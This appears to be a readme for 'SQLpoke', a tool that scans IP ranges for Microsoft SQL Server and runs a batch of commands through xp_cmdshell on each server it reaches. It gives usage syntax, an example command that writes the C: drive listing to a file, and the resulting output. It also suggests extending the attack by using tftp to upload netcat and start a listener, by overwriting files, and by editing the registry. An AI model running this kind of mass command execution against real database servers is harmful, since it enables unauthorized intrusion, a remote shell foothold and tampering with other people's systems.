SQLpoke

Execution:

sqlpoke [Start IP] [End IP] [Port] [Command File]

Note:- No more than 32 Commands allowed in the command file.

Expected Output:

C:\sqlpoke\Release>SQLPOKE 200.100.100.175 200.100.100.175 1433 commands.txt

Scan complete.
C:\sqlpoke\Release>

Note: - commands.txt = xp_cmdshell 'dir c:\ > c:\ip.txt'
Extra Note: - You must have SQL credentials for this to work!

Obviously the command passed to the sql server should have outputted the directory listing of the c:\ drive to a file called ip.txt utilsing the dangerous function xp_cmdshell which it did below:

volume in drive C has no label.
Volume Serial Number is DC22-D212

Directory of c:\

07/21/06 09:57a 0 AUTOEXEC.BAT
07/21/06 09:57a 0 CONFIG.SYS
07/21/06 09:23a <DIR> MSSQL7
07/21/06 10:38a 180,355,072 pagefile.sys
07/21/06 09:13a <DIR> Program Files
07/21/06 09:24a <DIR> TEMP
07/21/06 10:45a <DIR> WINNT
8 File(s) 180,355,072 bytes
1,654,722,048 bytes free

The beauty of this is though you can use this to say open a tftp session to a remote machine and possibly upload netcat and start it listening, overwrite files or read the registry/ change a registry key etc. dependant on what in-built SQL server function are enabled on the system.